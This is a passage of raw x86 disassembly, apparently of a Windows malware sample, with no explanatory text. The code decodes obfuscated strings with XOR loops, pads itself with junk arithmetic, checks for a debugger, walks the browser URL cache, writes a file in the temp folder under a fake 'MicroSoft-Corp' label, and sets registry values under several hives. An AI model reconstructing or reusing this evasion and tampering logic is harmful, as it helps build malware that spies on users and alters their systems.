lea eax, ds:418710h[eax] ; DATA XREF: sub_43F5A9�r
; sub_43F5B5�r
push eax
call sub_40C9F4 ; DATA XREF: sub_43F5C1�r
loc_40527C: ; DATA XREF: sub_43F5CD�r
add esp, 0Ch
xor edi, edi ; DATA XREF: sub_43F5D9�r
jmp short loc_40529A
; ---------------------------------------------------------------------------
loc_405283: ; CODE XREF: sub_405254:loc_40529C�j
; DATA XREF: sub_43F5E5�r
mov eax, dword_4412BC
add eax, edi
lea eax, ds:418710h[eax] ; DATA XREF: sub_43F5F1�r
movsx edx, byte ptr [eax]
xor edx, 2Ch
mov [eax], dl
inc edi
loc_40529A: ; CODE XREF: sub_405254+2D�j
cmp edi, esi
loc_40529C: ; DATA XREF: sub_43F5FD�r
jl short loc_405283
mov [ebp+var_8], 1BFh
mov eax, dword_4412BC ; DATA XREF: sub_43F6B9�r
add eax, esi
loc_4052AC: ; DATA XREF: sub_43F6C5�r sub_43F6D1�r
mov byte ptr ds:dword_418710[eax], 0
loc_4052B4: ; DATA XREF: sub_43F6DD�r sub_43F6E9�r
mov edi, dword_4412BC
mov eax, edi
loc_4052BC: ; DATA XREF: sub_43F6F5�r
lea eax, [eax+esi+1]
loc_4052C0: ; DATA XREF: sub_43F701�r sub_43F70D�r
mov dword_4412BC, eax
inc dword_4412BC ; DATA XREF: sub_43F719�r
cmp dword_4412BC, 0E06h ; DATA XREF: sub_43F725�r
; sub_43F731�r ...
jle short loc_4052DE
and dword_4412BC, 0 ; DATA XREF: sub_43F749�r sub_43F755�r
loc_4052DE: ; CODE XREF: sub_405254+81�j
; DATA XREF: sub_43F761�r ...
mov [ebp+var_C], 0B4h
lea eax, dword_418710[edi] ; DATA XREF: sub_43F779�r
pop edi
loc_4052EC: ; DATA XREF: sub_43F785�r
pop esi
leave
retn
sub_405254 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4052EF proc near ; CODE XREF: sub_4062CD+4E4�p
; sub_4062CD+501�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
loc_4052F0: ; DATA XREF: sub_43F791�r
mov ebp, esp
sub esp, 10h ; DATA XREF: sub_43F79D�r
push esi
push edi
mov [ebp+var_2], 665Dh ; DATA XREF: sub_43F7A9�r
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax ; DATA XREF: sub_43F7B5�r
mov eax, edx
mov [ebp+var_2], ax ; DATA XREF: sub_43F7C1�r
call sub_40C538 ; DATA XREF: sub_43F7CD�r
loc_405310: ; DATA XREF: sub_43F7D9�r
push 0
push 80h ; DATA XREF: sub_43F7E5�r
push 4 ; DATA XREF: sub_43F7F1�r
push 0
push 0 ; DATA XREF: sub_43F7FD�r
push 0C0000000h ; DATA XREF: sub_43F809�r
push [ebp+arg_0] ; DATA XREF: sub_43F815�r
call sub_40C67C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_405335 ; DATA XREF: sub_43F821�r
xor eax, eax
jmp short loc_40539D ; DATA XREF: sub_43F82D�r
; ---------------------------------------------------------------------------
loc_405335: ; CODE XREF: sub_4052EF+40�j
; DATA XREF: sub_43F839�r
mov esi, 5B97h
mov eax, 24A5h ; DATA XREF: sub_43F845�r
mul esi ; DATA XREF: sub_43F851�r
mov [ebp+var_C], eax
loc_405344: ; DATA XREF: sub_43F85D�r
mov esi, eax
push 2
loc_405348: ; DATA XREF: sub_43F869�r
push 0
push 0
loc_40534C: ; DATA XREF: sub_43F875�r
push edi
call sub_40C6AC ; DATA XREF: sub_43F881�r
mov esi, 113Bh ; DATA XREF: sub_43F88D�r
mov eax, esi ; DATA XREF: sub_43F899�r
add eax, esi
mov esi, eax
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8] ; DATA XREF: sub_43F8A5�r
push [ebp+arg_4] ; DATA XREF: sub_43F8B1�r
push edi
call sub_40C730 ; DATA XREF: sub_43F8BD�r
mov esi, 27C4h ; DATA XREF: sub_43F8C9�r
loc_405374: ; DATA XREF: sub_43F8D5�r sub_43F8E1�r
mov eax, 6888h
mul esi
mov [ebp+var_10], eax ; DATA XREF: sub_43F8ED�r
mov esi, eax
loc_405380: ; DATA XREF: sub_43F8F9�r
push edi
call sub_40C55C ; DATA XREF: sub_43F905�r
mov [ebp+var_4], 3676h ; DATA XREF: sub_43F911�r
loc_40538C: ; DATA XREF: sub_43F91D�r
movzx eax, [ebp+var_4]
loc_405390: ; DATA XREF: sub_43F929�r
mov edx, eax
add edx, eax
loc_405394: ; DATA XREF: sub_43F935�r
mov eax, edx
mov [ebp+var_4], ax ; DATA XREF: sub_43F941�r
xor eax, eax
inc eax
loc_40539D: ; CODE XREF: sub_4052EF+44�j
pop edi
pop esi
leave
retn
sub_4052EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053A1 proc near ; CODE XREF: sub_4062CD+440�p
var_2F52 = word ptr -2F52h
var_2F50 = byte ptr -2F50h
var_2F48 = word ptr -2F48h
var_2F46 = word ptr -2F46h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F54h
call sub_40C498
push ebx
push esi
push edi
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_2F50]
lea esi, aW_07ye ; "W _07ye"
movsd
movsd
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_40C4B8
call sub_40C5A4 ; GetVersion
push 1
push offset byte_446463
call sub_405254
mov edi, 0Fh
sub edi, dword_4412B8
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
call sub_401806
add esp, 14h
mov edi, eax
mov [ebp+var_2F48], di
mov [ebp+var_2F46], 4FF8h
add [ebp+var_2F46], 611Eh
movzx eax, [ebp+var_2F48]
cmp eax, 0FFFFh
jz short loc_405438
movzx eax, [ebp+var_2F48]
mov [ebp+eax+var_2F43], 0
loc_405438: ; CODE XREF: sub_4053A1+86�j
mov [ebp+var_1F44], 1F40h
call sub_40C574 ; GetProcessHeap
push 3
push offset byte_44645F
call sub_405254
add esp, 8
lea edi, [ebp+var_1F44]
push edi
lea edi, [ebp+var_1F40]
push edi
push eax
call sub_40BA18 ; FindFirstUrlCacheEntryA
mov ebx, eax
or eax, eax
jz loc_405522
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C9C4
add esp, 8
or eax, eax
jnz short loc_4054AF
call sub_40C598 ; GetTickCount
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C4B8
call sub_40C538 ; RtlGetLastWin32Error
xor eax, eax
inc eax
jmp short loc_405522
; ---------------------------------------------------------------------------
loc_4054AF: ; CODE XREF: sub_4053A1+EF�j
; sub_4053A1:loc_40551E�j
call sub_40C574 ; GetProcessHeap
mov [ebp+var_1F44], 1F40h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push ebx
call sub_40BA24 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_405520
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40C9C4
add esp, 8
or eax, eax
jnz short loc_40551E
mov ax, word_4412CC
mov [ebp+var_2F52], ax
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C4B8
call sub_40C598 ; GetTickCount
xor eax, eax
inc eax
jmp short loc_405522
; ---------------------------------------------------------------------------
loc_40551E: ; CODE XREF: sub_4053A1+156�j
jmp short loc_4054AF
; ---------------------------------------------------------------------------
loc_405520: ; CODE XREF: sub_4053A1+138�j
xor eax, eax
loc_405522: ; CODE XREF: sub_4053A1+CD�j
; sub_4053A1+10C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4053A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405527 proc near ; CODE XREF: sub_405601+5D8�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_14]
lea esi, aXaBi ; "#Xa/I"
mov ecx, 7
rep movsb
push [ebp+arg_0]
call sub_40C73C ; lstrlen
mov [ebp+var_8], eax
mov [ebp+var_D], 0Dh
add [ebp+var_D], 1
mov edi, eax
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_C], eax
xor ebx, ebx
jmp short loc_405585
; ---------------------------------------------------------------------------
loc_405569: ; CODE XREF: sub_405527+61�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+ebx]
xor eax, 71h
or eax, eax
jz short loc_405584
mov eax, ebx
add eax, [ebp+arg_0]
movzx edx, byte ptr [eax]
xor edx, 71h
mov [eax], dl
loc_405584: ; CODE XREF: sub_405527+4E�j
inc ebx
loc_405585: ; CODE XREF: sub_405527+40�j
cmp ebx, [ebp+var_8]
jb short loc_405569
mov [ebp+var_2], 0
jmp short loc_4055EB
; ---------------------------------------------------------------------------
loc_405592: ; CODE XREF: sub_405527+CB�j
push 6
push offset a_OO ; "\t_\tO\tO"
call sub_405254
mov [ebp+var_18], eax
movzx edi, [ebp+var_2]
mov esi, [ebp+arg_0]
movzx edi, byte ptr [esi+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_1C], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_18]
push esi
push edi
call sub_40CA30
add esp, 1Ch
inc [ebp+var_2]
loc_4055EB: ; CODE XREF: sub_405527+69�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_405592
call sub_40C514 ; GetCurrentThreadId
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_405527 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405601 proc near ; CODE XREF: sub_4062CD+176�p
var_300B4 = dword ptr -300B4h
var_300B0 = dword ptr -300B0h
var_300AC = dword ptr -300ACh
var_300A7 = byte ptr -300A7h
var_300A4 = dword ptr -300A4h
var_300A0 = dword ptr -300A0h
var_3009A = word ptr -3009Ah
var_30098 = dword ptr -30098h
var_30094 = dword ptr -30094h
var_30090 = dword ptr -30090h
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_30080 = word ptr -30080h
var_3007B = byte ptr -3007Bh
var_30073 = byte ptr -30073h
var_30072 = byte ptr -30072h
var_3006A = byte ptr -3006Ah
var_30063 = byte ptr -30063h
var_3005E = dword ptr -3005Eh
var_3005A = byte ptr -3005Ah
var_30053 = word ptr -30053h
var_30050 = word ptr -30050h
var_3004D = byte ptr -3004Dh
var_3004C = word ptr -3004Ch
var_3004A = byte ptr -3004Ah
var_30040 = byte ptr -30040h
var_30036 = word ptr -30036h
var_30034 = dword ptr -30034h
var_30030 = dword ptr -30030h
var_3002C = dword ptr -3002Ch
var_30025 = byte ptr -30025h
var_30024 = dword ptr -30024h
var_3001D = byte ptr -3001Dh
var_3001C = dword ptr -3001Ch
var_30018 = dword ptr -30018h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300B4h
call sub_40C498
push ebx
push esi
push edi
mov ax, word_4412D5
mov [ebp+var_30050+1], ax
and [ebp+var_30024], 0
mov [ebp+var_30025], 97h
add [ebp+var_30025], 1
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401A36
add esp, 8
mov ebx, eax
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405668
or ebx, ebx
jz short loc_405668
cmp [ebp+arg_14], eax
jb short loc_4056A5
loc_405668: ; CODE XREF: sub_405601+5C�j
; sub_405601+60�j
mov [ebp+var_30080], 6D59h
movzx eax, [ebp+var_30080]
imul eax, 0CC8h
mov [ebp+var_30080], ax
push ebx
call sub_40C658 ; LocalFree
mov [ebp+var_30084], 2194h
inc [ebp+var_30084]
mov [ebp+var_30024], 1
loc_4056A5: ; CODE XREF: sub_405601+65�j
push [ebp+arg_C]
call sub_40C73C ; lstrlen
mov [ebp+var_30084], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp+var_30088], eax
mov edi, [ebp+var_30084]
imul edi, [ebp+var_30084], 32h
mov esi, [ebp+var_30088]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_20008], eax
mov [ebp+var_30030], 1459h
sub [ebp+var_30030], 3900h
mov ax, word_4412D7
mov [ebp-30051h], ax
mov ax, word_4412D9
mov [ebp+var_30053], ax
push [ebp+arg_0]
push 104h
call sub_40C58C ; GetTempPathA
mov [ebp+var_30034], 6721h
add [ebp+var_30034], 7499h
mov eax, [ebp+arg_0]
mov [ebp+var_3008C], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_405749: ; CODE XREF: sub_405601+14D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405749
mov edi, eax
mov esi, 10h
sub esi, dword_4412B4
push esi
mov esi, [ebp+var_3008C]
add esi, edi
push esi
call sub_40170F
add esp, 8
push 4
push offset byte_446453
call sub_405254
add esp, 8
push eax
push [ebp+arg_0]
call sub_40CA54
add esp, 8
push 6
push offset dword_44644C
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
push 6
push offset byte_446445
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
mov [ebp+var_30036], 4962h
sub [ebp+var_30036], 55C0h
push 13h
push offset byte_446431
call sub_405254
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 10h
lea edi, [ebp+var_3005A]
lea esi, aMkQe9 ; "mk,qe9"
mov ecx, 7
rep movsb
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
mov eax, off_4412E2
mov [ebp+var_3005E], eax
push 7
push offset word_44641A
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C538 ; RtlGetLastWin32Error
push 6
push offset byte_446413
call sub_405254
add esp, 8
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp+var_30063]
lea esi, aK_0 ; "K &,"
mov ecx, 5
rep movsb
push 5
push offset byte_44640D
call sub_405254
add esp, 8
mov [ebp+var_30090], eax
call sub_40CA18
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30090]
push [ebp+var_30090]
lea edi, [ebp+var_30040]
push edi
call sub_40CA30
add esp, 0Ch
push 2Ah
push offset word_4463E2
call sub_405254
add esp, 8
lea edi, [ebp+var_30040]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 10h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C598 ; GetTickCount
push 2Dh
push offset dword_4463B4
call sub_405254
add esp, 8
mov [ebp+var_30094], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30094]
push [ebp+var_30094]
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 0Ch
mov [ebp+var_30018], 64D8h
mov eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov [ebp+var_30018], edx
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_30024], 0
jnz loc_405C81
cmp [ebp+arg_18], 0
jz loc_405B0E
mov ax, word_4412EB
mov [ebp+var_3009A], ax
and [ebp+var_30098], 0
jmp loc_405AF1
; ---------------------------------------------------------------------------
loc_4059B8: ; CODE XREF: sub_405601+4FC�j
lea edi, [ebp+var_300A7]
lea esi, byte_4412ED
mov ecx, 3
rep movsb
mov [ebp+var_10000], 0
mov [ebp+var_300A4], 4DFDh
mov eax, 5Dh
mul [ebp+var_300A4]
mov [ebp+var_300AC], eax
mov [ebp+var_300A4], eax
and [ebp+var_300A0], 0
jmp loc_405A93
; ---------------------------------------------------------------------------
loc_4059FF: ; CODE XREF: sub_405601+49C�j
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+var_30098]
add eax, [ebp+var_300A0]
cmp eax, [ebp+var_10004]
jnb loc_405AA3
push 6
push offset a_OO ; "\t_\tO\tO"
call sub_405254
mov [ebp+var_300B0], eax
mov edi, [ebp+var_30098]
add edi, [ebp+var_300A0]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300B4], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_300B0]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40CA30
add esp, 1Ch
call sub_40C598 ; GetTickCount
inc [ebp+var_300A0]
loc_405A93: ; CODE XREF: sub_405601+3F9�j
cmp [ebp+var_300A0], 80h
jb loc_4059FF
loc_405AA3: ; CODE XREF: sub_405601+415�j
push 30h
push offset byte_446383
call sub_405254
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 24h
add [ebp+var_30098], 80h
inc [ebp+var_2000C]
loc_405AF1: ; CODE XREF: sub_405601+3B2�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30098], eax
jb loc_4059B8
mov [ebp+var_30014], eax
jmp loc_405C81
; ---------------------------------------------------------------------------
loc_405B0E: ; CODE XREF: sub_405601+398�j
mov word ptr [ebp+var_30098+2], 0E7h
sub word ptr [ebp+var_30098+2], 3C4h
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405C5D
; ---------------------------------------------------------------------------
loc_405B2E: ; CODE XREF: sub_405601+67A�j
call sub_40C598 ; GetTickCount
cmp [ebp+var_10000], 0
jz loc_405C5D
mov byte ptr [ebp+var_30098+1], 8Bh
movzx eax, byte ptr [ebp+var_30098+1]
imul eax, 0C29h
mov byte ptr [ebp+var_30098+1], al
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405C81
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset byte_44637F
call sub_405254
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40CA30
add esp, 14h
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405BA2: ; CODE XREF: sub_405601+5A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405BA2
mov edi, eax
mov [ebp+var_3009A], di
lea eax, [ebp+var_10000]
push eax
movzx eax, [ebp+var_3009A]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C4B8
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_3000C]
push eax
call sub_405527
add esp, 4
mov [ebp+var_30010], eax
call sub_40C5A4 ; GetVersion
push 30h
push offset byte_446383
call sub_405254
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
add esp, 14h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40494F
add esp, 8
call sub_40C574 ; GetProcessHeap
push [ebp+var_30010]
call sub_40C658 ; LocalFree
lea edi, [ebp+var_300A4+3]
lea esi, aCcvJ8 ; "cc j8"
mov ecx, 7
rep movsb
inc [ebp+var_2000C]
loc_405C5D: ; CODE XREF: sub_405601+528�j
; sub_405601+539�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401B9A
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_405B2E
loc_405C81: ; CODE XREF: sub_405601+38E�j
; sub_405601+508�j ...
push 1Eh
push offset dword_446360
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
lea edi, [ebp+var_3006A]
lea esi, aTbrgnn ; "tRnn"
mov ecx, 7
rep movsb
push 7
push offset dword_446358
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
call sub_40C574 ; GetProcessHeap
push 8
push offset byte_44634F
call sub_405254
push eax
push [ebp+var_20008]
call sub_404663
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_30072]
lea esi, aHz_B ; "hZ.*~b!"
movsd
movsd
push 6
push offset dword_446348
call sub_405254
mov [ebp+var_30098], eax
call sub_40CA18
mov [ebp-3009Ch], eax
call sub_40CA18
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp-3009Ch]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_30098]
push edi
lea edi, [ebp+var_3004A]
push edi
call sub_40CA30
push 0Eh
push offset byte_446339
call sub_405254
lea edi, [ebp+var_3004A]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
mov [ebp+var_3004C], 7B91h
inc [ebp+var_3004C]
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
mov [ebp+var_3001C], 5751h
mov eax, [ebp+var_3001C]
mov edx, eax
add edx, eax
mov [ebp+var_3001C], edx
push 15h
push offset byte_446323
call sub_405254
lea edi, [ebp+var_30040]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
mov [ebp+var_3004D], 60h
movzx eax, [ebp+var_3004D]
imul eax, 170Ah
mov [ebp+var_3004D], al
push 1
push offset byte_446321
call sub_405254
push eax
push [ebp+var_20008]
call sub_404663
lea edi, [ebp+var_30073]
lea esi, byte_441306
xor ecx, ecx
inc ecx
rep movsb
push 16h
push offset word_44630A
call sub_405254
mov [ebp+var_300A0], eax
call sub_40CA18
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3004A]
push edi
mov edi, [ebp+var_300A0]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40CA30
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404663
call sub_40C598 ; GetTickCount
push 9
push offset dword_446300
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
push 7
push offset dword_4462F8
call sub_405254
push eax
push [ebp+var_20008]
call sub_40494F
lea edi, [ebp+var_3007B]
lea esi, aAxq@Mi ; "Axq@;mI"
mov ecx, 2
rep movsd
push 7
push offset dword_4462F0
call sub_405254
push eax
push [ebp+var_20008]
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
push [ebp+arg_0]
call sub_403449
add esp, 0E4h
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40C67C ; CreateFileA
mov [ebp+var_3002C], eax
mov [ebp+var_3001D], 0DCh
movzx eax, [ebp+var_3001D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3001D], al
push [ebp+var_20008]
call sub_40C73C ; lstrlen
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_3002C]
call sub_40C730 ; WriteFile
push [ebp+var_3002C]
call sub_40C55C ; CloseHandle
push [ebp+var_20008]
call sub_40C658 ; LocalFree
cmp [ebp+var_30024], 0
jnz short loc_405F69
push ebx
call sub_40C658 ; LocalFree
jmp short loc_405F6E
; ---------------------------------------------------------------------------
loc_405F69: ; CODE XREF: sub_405601+95E�j
or eax, 0FFFFFFFFh
jmp short loc_405F74
; ---------------------------------------------------------------------------
loc_405F6E: ; CODE XREF: sub_405601+966�j
mov eax, [ebp+var_30014]
loc_405F74: ; CODE XREF: sub_405601+96B�j
pop edi
pop esi
pop ebx
leave
retn
sub_405601 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F79 proc near ; CODE XREF: sub_4062CD:loc_4063F9�p
var_2125 = byte ptr -2125h
var_211E = byte ptr -211Eh
var_111F = byte ptr -111Fh
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_116 = byte ptr -116h
var_115 = byte ptr -115h
var_10E = dword ptr -10Eh
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2128h
call sub_40C498
push esi
push edi
call sub_40C538 ; RtlGetLastWin32Error
mov eax, dword_44130F
mov [ebp+var_10E+1], eax
lea edi, [ebp+var_115]
lea esi, a7ynj ; " * 7YNJ"
movsd
movsd
and [ebp+var_108], 0
mov [ebp+var_101], 0
jmp loc_4060E5
; ---------------------------------------------------------------------------
loc_405FB9: ; CODE XREF: sub_405F79+174�j
mov [ebp+var_116], 0ABh
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], al
push 44h
push offset byte_4462AB
call sub_405254
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CA30
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015EB
mov [ebp+var_118], 3316h
inc [ebp+var_118]
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015EB
call sub_40C598 ; GetTickCount
push 4Dh
push offset dword_446258
call sub_405254
movzx edi, [ebp+var_101]
push edi
push eax
lea edi, [ebp+var_100]
push edi
call sub_40CA30
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000002h
call sub_4015EB
call sub_40C5A4 ; GetVersion
push 4
push offset word_4462A6
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
lea edi, [ebp+var_100]
push edi
push 80000001h
call sub_4015EB
add esp, 0A8h
call sub_40C634 ; IsDebuggerPresent
add [ebp+var_101], 1
loc_4060E5: ; CODE XREF: sub_405F79+3B�j
mov al, [ebp+var_101]
cmp al, 5
jb loc_405FB9
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jb short loc_406172
mov [ebp+var_11C], 3E8Eh
sub [ebp+var_11C], 398Ch
push 4Ch
push offset byte_44620B
call sub_405254
mov [ebp+var_120], eax
push 10h
push offset aNC_ibiCoi__ ; "n^C[_IbI[|^COI__"
call sub_405254
mov [ebp+var_124], eax
push 3
push offset word_4461F6
call sub_405254
push 1
mov edi, 12h
sub edi, dword_4412B8
push edi
push eax
mov edi, [ebp+var_124]
push edi
mov edi, [ebp+var_120]
push edi
push 80000003h
call sub_4015EB
add esp, 30h
jmp loc_406222
; ---------------------------------------------------------------------------
loc_406172: ; CODE XREF: sub_405F79+184�j
call sub_40C598 ; GetTickCount
lea edi, [ebp+var_2125]
lea esi, aCowt9n ; "cowt9N"
mov ecx, 7
rep movsb
lea eax, [ebp+var_111F]
push eax
call sub_40518F
call sub_40C634 ; IsDebuggerPresent
push 59h
push offset dword_44619C
call sub_405254
lea edi, [ebp+var_111F]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
call sub_40CA30
mov [ebp+var_116], 0D3h
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], al
and [ebp+var_120], 0
push 0Ch
push offset byte_44618F
call sub_405254
push 4
push 4
lea edi, [ebp+var_120]
push edi
push eax
lea edi, [ebp+var_211E]
push edi
push 80000003h
call sub_4015EB
add esp, 38h
mov [ebp+var_11C], 6405h
mov eax, [ebp+var_11C]
mov edx, eax
add edx, eax
mov [ebp+var_11C], edx
loc_406222: ; CODE XREF: sub_405F79+1F4�j
push 3Bh
push offset byte_446153
call sub_405254
mov [ebp+var_11C], eax
push 11h
push offset aK@cnm@y_iCjj@e ; "k@CNM@y_I^cJJ@EBI"
call sub_405254
push 4
push 4
lea edi, [ebp+var_108]
push edi
push eax
